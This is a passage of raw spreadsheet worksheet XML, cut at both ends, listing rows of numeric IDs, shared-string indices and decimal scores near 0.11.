      <c r="B30898" s="2">
        <v>2.2881036E7</v>
      </c>
      <c r="C30898" s="2" t="s">
        <v>29711</v>
      </c>
      <c r="D30898" s="2">
        <v>1.0</v>
      </c>
      <c r="E30898" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30898" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="30899" ht="15.75" customHeight="1">
      <c r="A30899" s="1">
        <v>14028.0</v>
      </c>
      <c r="B30899" s="2">
        <v>3.750169E7</v>
      </c>
      <c r="C30899" s="2" t="s">
        <v>29712</v>
      </c>
      <c r="D30899" s="2">
        <v>1.0</v>
      </c>
      <c r="E30899" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30899" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="30900" ht="15.75" customHeight="1">
      <c r="A30900" s="1">
        <v>14695.0</v>
      </c>
      <c r="B30900" s="2">
        <v>4.0558152E7</v>
      </c>
      <c r="C30900" s="2" t="s">
        <v>29713</v>
      </c>
      <c r="D30900" s="2">
        <v>1.0</v>
      </c>
      <c r="E30900" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30900" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="30901" ht="15.75" customHeight="1">
      <c r="A30901" s="1">
        <v>16709.0</v>
      </c>
      <c r="B30901" s="2">
        <v>4.7425716E7</v>
      </c>
      <c r="C30901" s="2" t="s">
        <v>29714</v>
      </c>
      <c r="D30901" s="2">
        <v>1.0</v>
      </c>
      <c r="E30901" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30901" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="30902" ht="15.75" customHeight="1">
      <c r="A30902" s="1">
        <v>17256.0</v>
      </c>
      <c r="B30902" s="2">
        <v>4.9135913E7</v>
      </c>
      <c r="C30902" s="2" t="s">
        <v>29715</v>
      </c>
      <c r="D30902" s="2">
        <v>1.0</v>
      </c>
      <c r="E30902" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30902" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="30903" ht="15.75" customHeight="1">
      <c r="A30903" s="1">
        <v>19239.0</v>
      </c>
      <c r="B30903" s="2">
        <v>5.5078293E7</v>
      </c>
      <c r="C30903" s="2" t="s">
        <v>29716</v>
      </c>
      <c r="D30903" s="2">
        <v>1.0</v>
      </c>
      <c r="E30903" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30903" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="30904" ht="15.75" customHeight="1">
      <c r="A30904" s="1">
        <v>28956.0</v>
      </c>
      <c r="B30904" s="2">
        <v>2.9726531E7</v>
      </c>
      <c r="C30904" s="2" t="s">
        <v>29717</v>
      </c>
      <c r="D30904" s="2">
        <v>1.0</v>
      </c>
      <c r="E30904" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30904" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="30905" ht="15.75" customHeight="1">
      <c r="A30905" s="1">
        <v>31618.0</v>
      </c>
      <c r="B30905" s="2">
        <v>5144065.0</v>
      </c>
      <c r="C30905" s="2" t="s">
        <v>29718</v>
      </c>
      <c r="D30905" s="2">
        <v>1.0</v>
      </c>
      <c r="E30905" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30905" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="30906" ht="15.75" customHeight="1">
      <c r="A30906" s="1">
        <v>13081.0</v>
      </c>
      <c r="B30906" s="2">
        <v>3.3358399E7</v>
      </c>
      <c r="C30906" s="2" t="s">
        <v>29719</v>
      </c>
      <c r="D30906" s="2">
        <v>1.0</v>
      </c>
      <c r="E30906" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30906" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="30907" ht="15.75" customHeight="1">
      <c r="A30907" s="1">
        <v>16351.0</v>
      </c>
      <c r="B30907" s="2">
        <v>4.6100713E7</v>
      </c>
      <c r="C30907" s="2" t="s">
        <v>29720</v>
      </c>
      <c r="D30907" s="2">
        <v>1.0</v>
      </c>
      <c r="E30907" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30907" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="30908" ht="15.75" customHeight="1">
      <c r="A30908" s="1">
        <v>16525.0</v>
      </c>
      <c r="B30908" s="2">
        <v>4.6679944E7</v>
      </c>
      <c r="C30908" s="2" t="s">
        <v>29721</v>
      </c>
      <c r="D30908" s="2">
        <v>1.0</v>
      </c>
      <c r="E30908" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30908" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="30909" ht="15.75" customHeight="1">
      <c r="A30909" s="1">
        <v>18815.0</v>
      </c>
      <c r="B30909" s="2">
        <v>5.3918653E7</v>
      </c>
      <c r="C30909" s="2" t="s">
        <v>29722</v>
      </c>
      <c r="D30909" s="2">
        <v>1.0</v>
      </c>
      <c r="E30909" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30909" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="30910" ht="15.75" customHeight="1">
      <c r="A30910" s="1">
        <v>19398.0</v>
      </c>
      <c r="B30910" s="2">
        <v>5.5575548E7</v>
      </c>
      <c r="C30910" s="2" t="s">
        <v>29723</v>
      </c>
      <c r="D30910" s="2">
        <v>1.0</v>
      </c>
      <c r="E30910" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30910" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="30911" ht="15.75" customHeight="1">
      <c r="A30911" s="1">
        <v>21975.0</v>
      </c>
      <c r="B30911" s="2">
        <v>2.9170301E7</v>
      </c>
      <c r="C30911" s="2" t="s">
        <v>29724</v>
      </c>
      <c r="D30911" s="2">
        <v>1.0</v>
      </c>
      <c r="E30911" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30911" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="30912" ht="15.75" customHeight="1">
      <c r="A30912" s="1">
        <v>31914.0</v>
      </c>
      <c r="B30912" s="2">
        <v>5.3029446E7</v>
      </c>
      <c r="C30912" s="2" t="s">
        <v>29725</v>
      </c>
      <c r="D30912" s="2">
        <v>1.0</v>
      </c>
      <c r="E30912" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30912" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="30913" ht="15.75" customHeight="1">
      <c r="A30913" s="1">
        <v>33266.0</v>
      </c>
      <c r="B30913" s="2">
        <v>7367231.0</v>
      </c>
      <c r="C30913" s="2" t="s">
        <v>29726</v>
      </c>
      <c r="D30913" s="2">
        <v>1.0</v>
      </c>
      <c r="E30913" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30913" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="30914" ht="15.75" customHeight="1">
      <c r="A30914" s="1">
        <v>23109.0</v>
      </c>
      <c r="B30914" s="2">
        <v>5114527.0</v>
      </c>
      <c r="C30914" s="2" t="s">
        <v>29727</v>
      </c>
      <c r="D30914" s="2">
        <v>1.0</v>
      </c>
      <c r="E30914" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30914" s="2">
        <v>0.1140350877192982</v>
      </c>
    </row>
    <row r="30915" ht="15.75" customHeight="1">
      <c r="A30915" s="1">
        <v>3644.0</v>
      </c>
      <c r="B30915" s="2">
        <v>3.9283139E7</v>
      </c>
      <c r="C30915" s="2" t="s">
        <v>29728</v>
      </c>
      <c r="D30915" s="2">
        <v>1.0</v>
      </c>
      <c r="E30915" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30915" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="30916" ht="15.75" customHeight="1">
      <c r="A30916" s="1">
        <v>13071.0</v>
      </c>
      <c r="B30916" s="2">
        <v>3.3332127E7</v>
      </c>
      <c r="C30916" s="2" t="s">
        <v>29729</v>
      </c>
      <c r="D30916" s="2">
        <v>1.0</v>
      </c>
      <c r="E30916" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30916" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="30917" ht="15.75" customHeight="1">
      <c r="A30917" s="1">
        <v>28722.0</v>
      </c>
      <c r="B30917" s="2">
        <v>2.7915651E7</v>
      </c>
      <c r="C30917" s="2" t="s">
        <v>29730</v>
      </c>
      <c r="D30917" s="2">
        <v>1.0</v>
      </c>
      <c r="E30917" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30917" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="30918" ht="15.75" customHeight="1">
      <c r="A30918" s="1">
        <v>11252.0</v>
      </c>
      <c r="B30918" s="2">
        <v>2.0534515E7</v>
      </c>
      <c r="C30918" s="2" t="s">
        <v>29731</v>
      </c>
      <c r="D30918" s="2">
        <v>1.0</v>
      </c>
      <c r="E30918" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30918" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="30919" ht="15.75" customHeight="1">
      <c r="A30919" s="1">
        <v>16625.0</v>
      </c>
      <c r="B30919" s="2">
        <v>4.7063725E7</v>
      </c>
      <c r="C30919" s="2" t="s">
        <v>29732</v>
      </c>
      <c r="D30919" s="2">
        <v>1.0</v>
      </c>
      <c r="E30919" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30919" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="30920" ht="15.75" customHeight="1">
      <c r="A30920" s="1">
        <v>3999.0</v>
      </c>
      <c r="B30920" s="2">
        <v>4.0883082E7</v>
      </c>
      <c r="C30920" s="2" t="s">
        <v>29733</v>
      </c>
      <c r="D30920" s="2">
        <v>1.0</v>
      </c>
      <c r="E30920" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30920" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="30921" ht="15.75" customHeight="1">
      <c r="A30921" s="1">
        <v>4216.0</v>
      </c>
      <c r="B30921" s="2">
        <v>4.1708263E7</v>
      </c>
      <c r="C30921" s="2" t="s">
        <v>29734</v>
      </c>
      <c r="D30921" s="2">
        <v>1.0</v>
      </c>
      <c r="E30921" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30921" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="30922" ht="15.75" customHeight="1">
      <c r="A30922" s="1">
        <v>19515.0</v>
      </c>
      <c r="B30922" s="2">
        <v>5.594948E7</v>
      </c>
      <c r="C30922" s="2" t="s">
        <v>29735</v>
      </c>
      <c r="D30922" s="2">
        <v>1.0</v>
      </c>
      <c r="E30922" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30922" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="30923" ht="15.75" customHeight="1">
      <c r="A30923" s="1">
        <v>21067.0</v>
      </c>
      <c r="B30923" s="2">
        <v>1.7856902E7</v>
      </c>
      <c r="C30923" s="2" t="s">
        <v>29736</v>
      </c>
      <c r="D30923" s="2">
        <v>1.0</v>
      </c>
      <c r="E30923" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30923" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="30924" ht="15.75" customHeight="1">
      <c r="A30924" s="1">
        <v>710.0</v>
      </c>
      <c r="B30924" s="2">
        <v>2.0612975E7</v>
      </c>
      <c r="C30924" s="2" t="s">
        <v>29737</v>
      </c>
      <c r="D30924" s="2">
        <v>1.0</v>
      </c>
      <c r="E30924" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30924" s="2">
        <v>0.1137992831541219</v>
      </c>
    </row>
    <row r="30925" ht="15.75" customHeight="1">
      <c r="A30925" s="1">
        <v>25757.0</v>
      </c>
      <c r="B30925" s="2">
        <v>1.4612645E7</v>
      </c>
      <c r="C30925" s="2" t="s">
        <v>29738</v>
      </c>
      <c r="D30925" s="2">
        <v>1.0</v>
      </c>
      <c r="E30925" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30925" s="2">
        <v>0.1137992831541219</v>
      </c>
    </row>
    <row r="30926" ht="15.75" customHeight="1">
      <c r="A30926" s="1">
        <v>2429.0</v>
      </c>
      <c r="B30926" s="2">
        <v>3.3588488E7</v>
      </c>
      <c r="C30926" s="2" t="s">
        <v>29739</v>
      </c>
      <c r="D30926" s="2">
        <v>1.0</v>
      </c>
      <c r="E30926" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30926" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="30927" ht="15.75" customHeight="1">
      <c r="A30927" s="1">
        <v>2655.0</v>
      </c>
      <c r="B30927" s="2">
        <v>3.4686888E7</v>
      </c>
      <c r="C30927" s="2" t="s">
        <v>29740</v>
      </c>
      <c r="D30927" s="2">
        <v>1.0</v>
      </c>
      <c r="E30927" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30927" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="30928" ht="15.75" customHeight="1">
      <c r="A30928" s="1">
        <v>5852.0</v>
      </c>
      <c r="B30928" s="2">
        <v>4.6935345E7</v>
      </c>
      <c r="C30928" s="2" t="s">
        <v>29741</v>
      </c>
      <c r="D30928" s="2">
        <v>1.0</v>
      </c>
      <c r="E30928" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30928" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="30929" ht="15.75" customHeight="1">
      <c r="A30929" s="1">
        <v>11947.0</v>
      </c>
      <c r="B30929" s="2">
        <v>2.5559167E7</v>
      </c>
      <c r="C30929" s="2" t="s">
        <v>29742</v>
      </c>
      <c r="D30929" s="2">
        <v>1.0</v>
      </c>
      <c r="E30929" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30929" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="30930" ht="15.75" customHeight="1">
      <c r="A30930" s="1">
        <v>13273.0</v>
      </c>
      <c r="B30930" s="2">
        <v>3.4392058E7</v>
      </c>
      <c r="C30930" s="2" t="s">
        <v>29743</v>
      </c>
      <c r="D30930" s="2">
        <v>1.0</v>
      </c>
      <c r="E30930" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30930" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="30931" ht="15.75" customHeight="1">
      <c r="A30931" s="1">
        <v>17532.0</v>
      </c>
      <c r="B30931" s="2">
        <v>5.0106567E7</v>
      </c>
      <c r="C30931" s="2" t="s">
        <v>29744</v>
      </c>
      <c r="D30931" s="2">
        <v>1.0</v>
      </c>
      <c r="E30931" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30931" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="30932" ht="15.75" customHeight="1">
      <c r="A30932" s="1">
        <v>20154.0</v>
      </c>
      <c r="B30932" s="2">
        <v>1.0244205E7</v>
      </c>
      <c r="C30932" s="2" t="s">
        <v>29745</v>
      </c>
      <c r="D30932" s="2">
        <v>1.0</v>
      </c>
      <c r="E30932" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30932" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="30933" ht="15.75" customHeight="1">
      <c r="A30933" s="1">
        <v>24181.0</v>
      </c>
      <c r="B30933" s="2">
        <v>1.0244204E7</v>
      </c>
      <c r="C30933" s="2" t="s">
        <v>29745</v>
      </c>
      <c r="D30933" s="2">
        <v>1.0</v>
      </c>
      <c r="E30933" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30933" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="30934" ht="15.75" customHeight="1">
      <c r="A30934" s="1">
        <v>24564.0</v>
      </c>
      <c r="B30934" s="2">
        <v>1.1302022E7</v>
      </c>
      <c r="C30934" s="2" t="s">
        <v>29746</v>
      </c>
      <c r="D30934" s="2">
        <v>1.0</v>
      </c>
      <c r="E30934" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30934" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="30935" ht="15.75" customHeight="1">
      <c r="A30935" s="1">
        <v>27022.0</v>
      </c>
      <c r="B30935" s="2">
        <v>2.0036703E7</v>
      </c>
      <c r="C30935" s="2" t="s">
        <v>29747</v>
      </c>
      <c r="D30935" s="2">
        <v>1.0</v>
      </c>
      <c r="E30935" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30935" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="30936" ht="15.75" customHeight="1">
      <c r="A30936" s="1">
        <v>28374.0</v>
      </c>
      <c r="B30936" s="2">
        <v>2.6062575E7</v>
      </c>
      <c r="C30936" s="2" t="s">
        <v>29748</v>
      </c>
      <c r="D30936" s="2">
        <v>1.0</v>
      </c>
      <c r="E30936" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30936" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="30937" ht="15.75" customHeight="1">
      <c r="A30937" s="1">
        <v>32301.0</v>
      </c>
      <c r="B30937" s="2">
        <v>5.5536436E7</v>
      </c>
      <c r="C30937" s="2" t="s">
        <v>29749</v>
      </c>
      <c r="D30937" s="2">
        <v>1.0</v>
      </c>
      <c r="E30937" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30937" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="30938" ht="15.75" customHeight="1">
      <c r="A30938" s="1">
        <v>24283.0</v>
      </c>
      <c r="B30938" s="2">
        <v>1.0550809E7</v>
      </c>
      <c r="C30938" s="2" t="s">
        <v>29750</v>
      </c>
      <c r="D30938" s="2">
        <v>1.0</v>
      </c>
      <c r="E30938" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30938" s="2">
        <v>0.1137152777777778</v>
      </c>
    </row>
    <row r="30939" ht="15.75" customHeight="1">
      <c r="A30939" s="1">
        <v>6132.0</v>
      </c>
      <c r="B30939" s="2">
        <v>4.7801501E7</v>
      </c>
      <c r="C30939" s="2" t="s">
        <v>29751</v>
      </c>
      <c r="D30939" s="2">
        <v>1.0</v>
      </c>
      <c r="E30939" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30939" s="2">
        <v>0.1136752136752137</v>
      </c>
    </row>
    <row r="30940" ht="15.75" customHeight="1">
      <c r="A30940" s="1">
        <v>21646.0</v>
      </c>
      <c r="B30940" s="2">
        <v>2.4797766E7</v>
      </c>
      <c r="C30940" s="2" t="s">
        <v>29752</v>
      </c>
      <c r="D30940" s="2">
        <v>1.0</v>
      </c>
      <c r="E30940" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30940" s="2">
        <v>0.1134585289514867</v>
      </c>
    </row>
    <row r="30941" ht="15.75" customHeight="1">
      <c r="A30941" s="1">
        <v>5740.0</v>
      </c>
      <c r="B30941" s="2">
        <v>4.6622328E7</v>
      </c>
      <c r="C30941" s="2" t="s">
        <v>29753</v>
      </c>
      <c r="D30941" s="2">
        <v>1.0</v>
      </c>
      <c r="E30941" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30941" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="30942" ht="15.75" customHeight="1">
      <c r="A30942" s="1">
        <v>7853.0</v>
      </c>
      <c r="B30942" s="2">
        <v>5.2350964E7</v>
      </c>
      <c r="C30942" s="2" t="s">
        <v>29754</v>
      </c>
      <c r="D30942" s="2">
        <v>1.0</v>
      </c>
      <c r="E30942" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30942" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="30943" ht="15.75" customHeight="1">
      <c r="A30943" s="1">
        <v>3741.0</v>
      </c>
      <c r="B30943" s="2">
        <v>3.968841E7</v>
      </c>
      <c r="C30943" s="2" t="s">
        <v>29755</v>
      </c>
      <c r="D30943" s="2">
        <v>1.0</v>
      </c>
      <c r="E30943" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30943" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="30944" ht="15.75" customHeight="1">
      <c r="A30944" s="1">
        <v>4474.0</v>
      </c>
      <c r="B30944" s="2">
        <v>4.2475546E7</v>
      </c>
      <c r="C30944" s="2" t="s">
        <v>29756</v>
      </c>
      <c r="D30944" s="2">
        <v>1.0</v>
      </c>
      <c r="E30944" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30944" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="30945" ht="15.75" customHeight="1">
      <c r="A30945" s="1">
        <v>11326.0</v>
      </c>
      <c r="B30945" s="2">
        <v>2.1081463E7</v>
      </c>
      <c r="C30945" s="2" t="s">
        <v>29757</v>
      </c>
      <c r="D30945" s="2">
        <v>1.0</v>
      </c>
      <c r="E30945" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30945" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="30946" ht="15.75" customHeight="1">
      <c r="A30946" s="1">
        <v>11383.0</v>
      </c>
      <c r="B30946" s="2">
        <v>2.1442091E7</v>
      </c>
      <c r="C30946" s="2" t="s">
        <v>29758</v>
      </c>
      <c r="D30946" s="2">
        <v>1.0</v>
      </c>
      <c r="E30946" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30946" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="30947" ht="15.75" customHeight="1">
      <c r="A30947" s="1">
        <v>12764.0</v>
      </c>
      <c r="B30947" s="2">
        <v>3.1196063E7</v>
      </c>
      <c r="C30947" s="2" t="s">
        <v>29759</v>
      </c>
      <c r="D30947" s="2">
        <v>1.0</v>
      </c>
      <c r="E30947" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30947" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="30948" ht="15.75" customHeight="1">
      <c r="A30948" s="1">
        <v>16875.0</v>
      </c>
      <c r="B30948" s="2">
        <v>4.7966746E7</v>
      </c>
      <c r="C30948" s="2" t="s">
        <v>29760</v>
      </c>
      <c r="D30948" s="2">
        <v>1.0</v>
      </c>
      <c r="E30948" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30948" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="30949" ht="15.75" customHeight="1">
      <c r="A30949" s="1">
        <v>20562.0</v>
      </c>
      <c r="B30949" s="2">
        <v>1.3410232E7</v>
      </c>
      <c r="C30949" s="2" t="s">
        <v>29675</v>
      </c>
      <c r="D30949" s="2">
        <v>1.0</v>
      </c>
      <c r="E30949" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30949" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="30950" ht="15.75" customHeight="1">
      <c r="A30950" s="1">
        <v>27698.0</v>
      </c>
      <c r="B30950" s="2">
        <v>2.3013144E7</v>
      </c>
      <c r="C30950" s="2" t="s">
        <v>29761</v>
      </c>
      <c r="D30950" s="2">
        <v>1.0</v>
      </c>
      <c r="E30950" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30950" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="30951" ht="15.75" customHeight="1">
      <c r="A30951" s="1">
        <v>28385.0</v>
      </c>
      <c r="B30951" s="2">
        <v>2.6119611E7</v>
      </c>
      <c r="C30951" s="2" t="s">
        <v>29762</v>
      </c>
      <c r="D30951" s="2">
        <v>1.0</v>
      </c>
      <c r="E30951" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30951" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="30952" ht="15.75" customHeight="1">
      <c r="A30952" s="1">
        <v>29331.0</v>
      </c>
      <c r="B30952" s="2">
        <v>3.1319521E7</v>
      </c>
      <c r="C30952" s="2" t="s">
        <v>29763</v>
      </c>
      <c r="D30952" s="2">
        <v>1.0</v>
      </c>
      <c r="E30952" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30952" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="30953" ht="15.75" customHeight="1">
      <c r="A30953" s="1">
        <v>31562.0</v>
      </c>
      <c r="B30953" s="2">
        <v>5121429.0</v>
      </c>
      <c r="C30953" s="2" t="s">
        <v>29764</v>
      </c>
      <c r="D30953" s="2">
        <v>1.0</v>
      </c>
      <c r="E30953" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30953" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="30954" ht="15.75" customHeight="1">
      <c r="A30954" s="1">
        <v>34106.0</v>
      </c>
      <c r="B30954" s="2">
        <v>9701813.0</v>
      </c>
      <c r="C30954" s="2" t="s">
        <v>29765</v>
      </c>
      <c r="D30954" s="2">
        <v>1.0</v>
      </c>
      <c r="E30954" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30954" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="30955" ht="15.75" customHeight="1">
      <c r="A30955" s="1">
        <v>7.0</v>
      </c>
      <c r="B30955" s="2">
        <v>1.0171443E7</v>
      </c>
      <c r="C30955" s="2" t="s">
        <v>29766</v>
      </c>
      <c r="D30955" s="2">
        <v>1.0</v>
      </c>
      <c r="E30955" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30955" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30956" ht="15.75" customHeight="1">
      <c r="A30956" s="1">
        <v>180.0</v>
      </c>
      <c r="B30956" s="2">
        <v>1.4178553E7</v>
      </c>
      <c r="C30956" s="2" t="s">
        <v>29767</v>
      </c>
      <c r="D30956" s="2">
        <v>1.0</v>
      </c>
      <c r="E30956" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30956" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30957" ht="15.75" customHeight="1">
      <c r="A30957" s="1">
        <v>557.0</v>
      </c>
      <c r="B30957" s="2">
        <v>1.8849592E7</v>
      </c>
      <c r="C30957" s="2" t="s">
        <v>29768</v>
      </c>
      <c r="D30957" s="2">
        <v>1.0</v>
      </c>
      <c r="E30957" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30957" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30958" ht="15.75" customHeight="1">
      <c r="A30958" s="1">
        <v>590.0</v>
      </c>
      <c r="B30958" s="2">
        <v>1.9170689E7</v>
      </c>
      <c r="C30958" s="2" t="s">
        <v>29769</v>
      </c>
      <c r="D30958" s="2">
        <v>1.0</v>
      </c>
      <c r="E30958" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30958" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30959" ht="15.75" customHeight="1">
      <c r="A30959" s="1">
        <v>672.0</v>
      </c>
      <c r="B30959" s="2">
        <v>2.0255194E7</v>
      </c>
      <c r="C30959" s="2" t="s">
        <v>29770</v>
      </c>
      <c r="D30959" s="2">
        <v>1.0</v>
      </c>
      <c r="E30959" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30959" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30960" ht="15.75" customHeight="1">
      <c r="A30960" s="1">
        <v>829.0</v>
      </c>
      <c r="B30960" s="2">
        <v>2.1559264E7</v>
      </c>
      <c r="C30960" s="2" t="s">
        <v>29771</v>
      </c>
      <c r="D30960" s="2">
        <v>1.0</v>
      </c>
      <c r="E30960" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30960" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30961" ht="15.75" customHeight="1">
      <c r="A30961" s="1">
        <v>830.0</v>
      </c>
      <c r="B30961" s="2">
        <v>2.155988E7</v>
      </c>
      <c r="C30961" s="2" t="s">
        <v>29772</v>
      </c>
      <c r="D30961" s="2">
        <v>1.0</v>
      </c>
      <c r="E30961" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30961" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30962" ht="15.75" customHeight="1">
      <c r="A30962" s="1">
        <v>899.0</v>
      </c>
      <c r="B30962" s="2">
        <v>2.2111401E7</v>
      </c>
      <c r="C30962" s="2" t="s">
        <v>29773</v>
      </c>
      <c r="D30962" s="2">
        <v>1.0</v>
      </c>
      <c r="E30962" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30962" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30963" ht="15.75" customHeight="1">
      <c r="A30963" s="1">
        <v>931.0</v>
      </c>
      <c r="B30963" s="2">
        <v>2.2358608E7</v>
      </c>
      <c r="C30963" s="2" t="s">
        <v>29774</v>
      </c>
      <c r="D30963" s="2">
        <v>1.0</v>
      </c>
      <c r="E30963" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30963" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30964" ht="15.75" customHeight="1">
      <c r="A30964" s="1">
        <v>991.0</v>
      </c>
      <c r="B30964" s="2">
        <v>2.2893597E7</v>
      </c>
      <c r="C30964" s="2" t="s">
        <v>29775</v>
      </c>
      <c r="D30964" s="2">
        <v>1.0</v>
      </c>
      <c r="E30964" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30964" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30965" ht="15.75" customHeight="1">
      <c r="A30965" s="1">
        <v>1023.0</v>
      </c>
      <c r="B30965" s="2">
